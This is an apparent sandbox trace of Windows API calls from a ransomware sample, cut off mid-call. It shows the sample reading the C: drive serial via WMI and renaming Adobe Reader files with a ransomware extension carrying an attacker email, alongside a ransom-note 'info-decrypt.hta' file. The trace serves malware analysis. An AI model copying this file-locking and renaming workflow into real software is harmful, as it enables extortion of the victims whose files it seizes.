WbemDefPath:IUnknown:QueryInterface (in: This=0x6030fd0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e54c | out: ppvObject=0x8f6e54c*=0x6030fd0) returned 0x0 [0179.088] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030fd0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e508 | out: ppvObject=0x8f6e508*=0x0) returned 0x80004002 [0179.088] WbemDefPath:IUnknown:AddRef (This=0x6030fd0) returned 0x3 [0179.088] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030fd0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6de64 | out: ppvObject=0x8f6de64*=0x0) returned 0x80004002 [0179.088] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030fd0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6de14 | out: ppvObject=0x8f6de14*=0x0) returned 0x80004002 [0179.088] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030fd0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6de20 | out: ppvObject=0x8f6de20*=0xbb5a68) returned 0x0 [0179.088] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb5a68, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6de28 | out: pCid=0x8f6de28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0179.088] WbemDefPath:IUnknown:Release (This=0xbb5a68) returned 0x3 [0179.088] CoGetContextToken (in: pToken=0x8f6de80 | out: pToken=0x8f6de80) returned 0x0 [0179.089] CoGetContextToken (in: pToken=0x8f6e288 | out: pToken=0x8f6e288) returned 0x0 [0179.089] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030fd0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e318 | out: ppvObject=0x8f6e318*=0x0) returned 0x80004002 [0179.089] WbemDefPath:IUnknown:Release (This=0x6030fd0) returned 0x2 [0179.089] WbemDefPath:IUnknown:Release (This=0x6030fd0) returned 0x1 [0179.089] CoGetContextToken (in: pToken=0x8f6ec10 | out: pToken=0x8f6ec10) returned 0x0 [0179.089] CoGetContextToken (in: pToken=0x8f6eb70 | out: pToken=0x8f6eb70) returned 0x0 [0179.089] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030fd0, riid=0x8f6ec40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ec3c | out: ppvObject=0x8f6ec3c*=0x6030fd0) returned 0x0 [0179.089] WbemDefPath:IUnknown:AddRef (This=0x6030fd0) returned 0x3 [0179.089] WbemDefPath:IUnknown:Release (This=0x6030fd0) returned 0x2 [0179.089] WbemDefPath:IWbemPath:SetText (This=0x6030fd0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0179.089] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030fd0, puCount=0x8f6edc0 | out: puCount=0x8f6edc0*=0x2) returned 0x0 [0179.089] WbemDefPath:IWbemPath:GetText (in: This=0x6030fd0, lFlags=4, puBuffLength=0x8f6edbc*=0x0, pszText=0x0 | out: puBuffLength=0x8f6edbc*=0xf, pszText=0x0) returned 0x0 [0179.089] WbemDefPath:IWbemPath:GetText (in: This=0x6030fd0, lFlags=4, puBuffLength=0x8f6edbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6edbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0179.089] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6edc0 | out: ppv=0x8f6edc0*=0xb51e34) returned 0x0 [0179.089] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6edb8 | out: pAptType=0x8f6edb8*=1) returned 0x0 [0179.089] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6edbc | out: ppvObject=0x8f6edbc*=0x0) returned 0x80004002 [0179.089] IUnknown:Release (This=0xb51e34) returned 0x1 [0179.312] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e9e0 | out: ppv=0x8f6e9e0*=0x601f318) returned 0x0 [0179.312] WbemLocator:IUnknown:QueryInterface (in: This=0x601f318, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6ebf8 | out: ppvObject=0x8f6ebf8*=0x0) returned 0x80004002 [0179.312] WbemLocator:IClassFactory:CreateInstance (in: This=0x601f318, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ec0c | out: ppvObject=0x8f6ec0c*=0x60277b0) returned 0x0 [0179.312] WbemLocator:IUnknown:Release (This=0x601f318) returned 0x0 [0179.312] WbemLocator:IUnknown:QueryInterface (in: This=0x60277b0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e82c | out: ppvObject=0x8f6e82c*=0x60277b0) returned 0x0 [0179.312] WbemLocator:IUnknown:QueryInterface (in: This=0x60277b0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e7e8 | out: ppvObject=0x8f6e7e8*=0x0) returned 0x80004002 [0179.312] WbemLocator:IUnknown:AddRef (This=0x60277b0) returned 0x3 [0179.312] WbemLocator:IUnknown:QueryInterface (in: This=0x60277b0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e144 | out: ppvObject=0x8f6e144*=0x0) returned 0x80004002 [0179.313] WbemLocator:IUnknown:QueryInterface (in: This=0x60277b0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e0f4 | out: ppvObject=0x8f6e0f4*=0x0) returned 0x80004002 [0179.313] WbemLocator:IUnknown:QueryInterface (in: This=0x60277b0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e100 | out: ppvObject=0x8f6e100*=0x0) returned 0x80004002 [0179.313] CoGetContextToken (in: pToken=0x8f6e160 | out: pToken=0x8f6e160) returned 0x0 [0179.313] CoGetContextToken (in: pToken=0x8f6e568 | out: pToken=0x8f6e568) returned 0x0 [0179.313] WbemLocator:IUnknown:QueryInterface (in: This=0x60277b0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e5f8 | out: ppvObject=0x8f6e5f8*=0x0) returned 0x80004002 [0179.313] WbemLocator:IUnknown:Release (This=0x60277b0) returned 0x2 [0179.313] WbemLocator:IUnknown:Release (This=0x60277b0) returned 0x1 [0179.313] CoGetContextToken (in: pToken=0x8f6ebd8 | out: pToken=0x8f6ebd8) returned 0x0 [0179.313] CoGetContextToken (in: pToken=0x8f6eb38 | out: pToken=0x8f6eb38) returned 0x0 [0179.313] WbemLocator:IUnknown:QueryInterface (in: This=0x60277b0, riid=0x8f6ec08*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x8f6ec04 | out: ppvObject=0x8f6ec04*=0x60277b0) returned 0x0 [0179.313] WbemLocator:IUnknown:AddRef (This=0x60277b0) returned 0x3 [0179.313] WbemLocator:IUnknown:Release (This=0x60277b0) returned 0x2 [0179.313] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030fd0, puCount=0x8f6ed9c | out: puCount=0x8f6ed9c*=0x2) returned 0x0 [0179.313] WbemDefPath:IWbemPath:GetText (in: This=0x6030fd0, lFlags=8, puBuffLength=0x8f6ed98*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ed98*=0xf, pszText=0x0) returned 0x0 [0179.313] WbemDefPath:IWbemPath:GetText (in: This=0x6030fd0, lFlags=8, puBuffLength=0x8f6ed98*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ed98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0179.313] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8f6ec74 | out: ppv=0x8f6ec74*=0x60277f0) returned 0x0 [0179.313] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60277f0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x8f6ed08 | out: ppNamespace=0x8f6ed08*=0x6033424) returned 0x0 [0181.748] WbemLocator:IUnknown:QueryInterface (in: This=0x6033424, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eba4 | out: ppvObject=0x8f6eba4*=0xb5be54) returned 0x0 [0181.748] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5be54, pProxy=0x6033424, pAuthnSvc=0x8f6ebf4, pAuthzSvc=0x8f6ebf0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec, pImpLevel=0x8f6ebdc, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4 | out: pAuthnSvc=0x8f6ebf4*=0xa, pAuthzSvc=0x8f6ebf0*=0x0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec*=0x6, pImpLevel=0x8f6ebdc*=0x2, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4*=0x1) returned 0x0 [0181.748] WbemLocator:IUnknown:Release (This=0xb5be54) returned 0x1 [0181.748] WbemLocator:IUnknown:QueryInterface (in: This=0x6033424, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb98 | out: ppvObject=0x8f6eb98*=0xb5be74) returned 0x0 [0181.748] WbemLocator:IUnknown:QueryInterface (in: This=0x6033424, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb94 | out: ppvObject=0x8f6eb94*=0xb5be54) returned 0x0 [0181.748] WbemLocator:IClientSecurity:SetBlanket (This=0xb5be54, pProxy=0x6033424, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0181.748] WbemLocator:IUnknown:Release (This=0xb5be54) returned 0x2 [0181.748] WbemLocator:IUnknown:Release (This=0xb5be74) returned 0x1 [0181.748] CoTaskMemFree (pv=0xbd4a68) [0181.749] WbemLocator:IUnknown:Release (This=0x60277f0) returned 0x0 [0181.749] WbemLocator:IUnknown:QueryInterface (in: This=0x6033424, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e794 | out: ppvObject=0x8f6e794*=0xb5be74) returned 0x0 [0181.749] WbemLocator:IUnknown:QueryInterface (in: This=0xb5be74, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e750 | out: ppvObject=0x8f6e750*=0x0) returned 0x80004002 [0181.934] WbemLocator:IUnknown:QueryInterface (in: This=0xb5be74, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e56c | out: ppvObject=0x8f6e56c*=0x0) returned 0x80004002 [0181.938] WbemLocator:IUnknown:AddRef (This=0xb5be74) returned 0x3 [0181.938] WbemLocator:IUnknown:QueryInterface (in: This=0xb5be74, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e0ac | out: ppvObject=0x8f6e0ac*=0x0) returned 0x80004002 [0181.938] WbemLocator:IUnknown:QueryInterface (in: This=0xb5be74, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e05c | out: ppvObject=0x8f6e05c*=0x0) returned 0x80004002 [0181.942] WbemLocator:IUnknown:QueryInterface (in: This=0xb5be74, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e068 | out: ppvObject=0x8f6e068*=0xb5bdd4) returned 0x0 [0181.942] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5bdd4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6e070 | out: pCid=0x8f6e070*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0181.942] WbemLocator:IUnknown:Release (This=0xb5bdd4) returned 0x3 [0181.942] CoGetContextToken (in: pToken=0x8f6e0c8 | out: pToken=0x8f6e0c8) returned 0x0 [0181.942] CoGetContextToken (in: pToken=0x8f6e4d0 | out: pToken=0x8f6e4d0) returned 0x0 [0181.943] WbemLocator:IUnknown:QueryInterface (in: This=0xb5be74, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e560 | out: ppvObject=0x8f6e560*=0xb5be5c) returned 0x0 [0181.943] WbemLocator:IRpcOptions:Query (in: This=0xb5be5c, pPrx=0xb5be74, dwProperty=2, pdwValue=0x8f6e588 | out: pdwValue=0x8f6e588) returned 0x80004002 [0181.943] WbemLocator:IUnknown:Release (This=0xb5be5c) returned 0x3 [0181.943] WbemLocator:IUnknown:Release (This=0xb5be74) returned 0x2 [0181.943] CoGetContextToken (in: pToken=0x8f6eaa8 | out: pToken=0x8f6eaa8) returned 0x0 [0181.943] CoGetContextToken (in: pToken=0x8f6ea08 | out: pToken=0x8f6ea08) returned 0x0 [0181.943] WbemLocator:IUnknown:QueryInterface (in: This=0xb5be74, riid=0x8f6ead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8f6ead4 | out: ppvObject=0x8f6ead4*=0x6033424) returned 0x0 [0181.943] WbemLocator:IUnknown:AddRef (This=0x6033424) returned 0x4 [0181.943] WbemLocator:IUnknown:Release (This=0x6033424) returned 0x3 [0181.943] WbemLocator:IUnknown:Release (This=0x6033424) returned 0x2 [0181.943] SysStringLen (param_1=0x0) returned 0x0 [0181.943] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030f60, puCount=0x8f6ee6c | out: puCount=0x8f6ee6c*=0x0) returned 0x0 [0181.943] WbemDefPath:IWbemPath:GetText (in: This=0x6030f60, lFlags=2, puBuffLength=0x8f6ee68*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee68*=0x20, pszText=0x0) returned 0x0 [0181.943] WbemDefPath:IWbemPath:GetText (in: This=0x6030f60, lFlags=2, puBuffLength=0x8f6ee68*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee68*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0181.943] CoGetContextToken (in: pToken=0x8f6ead8 | out: pToken=0x8f6ead8) returned 0x0 [0181.943] WbemLocator:IUnknown:AddRef (This=0xb5be74) returned 0x3 [0181.943] WbemLocator:IUnknown:QueryInterface (in: This=0xb5be74, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e96c | out: ppvObject=0x8f6e96c*=0xb5be74) returned 0x0 [0181.943] WbemLocator:IUnknown:Release (This=0xb5be74) returned 0x3 [0181.943] WbemLocator:IUnknown:Release (This=0xb5be74) returned 0x2 [0181.943] WbemDefPath:IWbemPath:GetText (in: This=0x6030f60, lFlags=2, puBuffLength=0x8f6ee70*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee70*=0x20, pszText=0x0) returned 0x0 [0181.944] WbemDefPath:IWbemPath:GetText (in: This=0x6030f60, lFlags=2, puBuffLength=0x8f6ee70*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee70*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0181.944] IWbemServices:GetObject (in: This=0x6033424, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x8f6ee24*=0x0, ppCallResult=0x0 | out: ppObject=0x8f6ee24*=0x60287e0, ppCallResult=0x0) returned 0x0 [0182.402] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030fd0, puCount=0x8f6ee24 | out: puCount=0x8f6ee24*=0x2) returned 0x0 [0182.402] WbemDefPath:IWbemPath:GetText (in: This=0x6030fd0, lFlags=4, puBuffLength=0x8f6ee20*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee20*=0xf, pszText=0x0) returned 0x0 [0182.402] WbemDefPath:IWbemPath:GetText (in: This=0x6030fd0, lFlags=4, puBuffLength=0x8f6ee20*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ee20*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0182.402] IWbemClassObject:Get (in: This=0x60287e0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x37449d0*=0, plFlavor=0x37449d4*=0 | out: pVal=0x8f6ee20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x37449d0*=8, plFlavor=0x37449d4*=0) returned 0x0 [0182.403] SysStringByteLen (bstr="9C354B42") returned 0x10 [0182.403] SysStringByteLen (bstr="9C354B42") returned 0x10 [0182.403] IWbemClassObject:Get (in: This=0x60287e0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x37449d0*=8, plFlavor=0x37449d4*=0 | out: pVal=0x8f6ee28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x37449d0*=8, plFlavor=0x37449d4*=0) returned 0x0 [0182.403] SysStringByteLen (bstr="9C354B42") returned 0x10 [0182.403] SysStringByteLen (bstr="9C354B42") returned 0x10 [0182.403] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Llegiu-me.htm", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Llegiu-me.htm", lpFilePart=0x0) returned 0x36 [0182.403] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Llegiu-me.htm.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Llegiu-me.htm.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x59 [0182.403] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee88) returned 1 [0182.403] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Llegiu-me.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\llegiu-me.htm"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef04 | out: lpFileInformation=0x8f6ef04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x2576d460, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0182.403] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee84) returned 1 [0182.403] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Llegiu-me.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\llegiu-me.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Llegiu-me.htm.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\llegiu-me.htm.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0182.404] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LueMinut.htm", nBufferLength=0x105, lpBuffer=0x8f6ea40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LueMinut.htm", lpFilePart=0x0) returned 0x35 [0182.404] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0182.404] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eea8) returned 1 [0182.404] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef24 | out: lpFileInformation=0x8f6ef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x129dd140, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x129dd140, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x12b0dc40, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0182.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eea4) returned 1 [0182.405] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LueMinut.htm", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LueMinut.htm", lpFilePart=0x0) returned 0x35 [0182.405] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eef4) returned 1 [0182.405] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LueMinut.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\lueminut.htm"), fInfoLevelId=0x0, lpFileInformation=0x3744f04 | out: lpFileInformation=0x3744f04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x434e)) returned 1 [0182.405] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eef0) returned 1 [0182.405] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LueMinut.htm", nBufferLength=0x105, lpBuffer=0x8f6e934, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LueMinut.htm", lpFilePart=0x0) returned 0x35 [0182.405] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee28) returned 1 [0182.405] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LueMinut.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\lueminut.htm"), 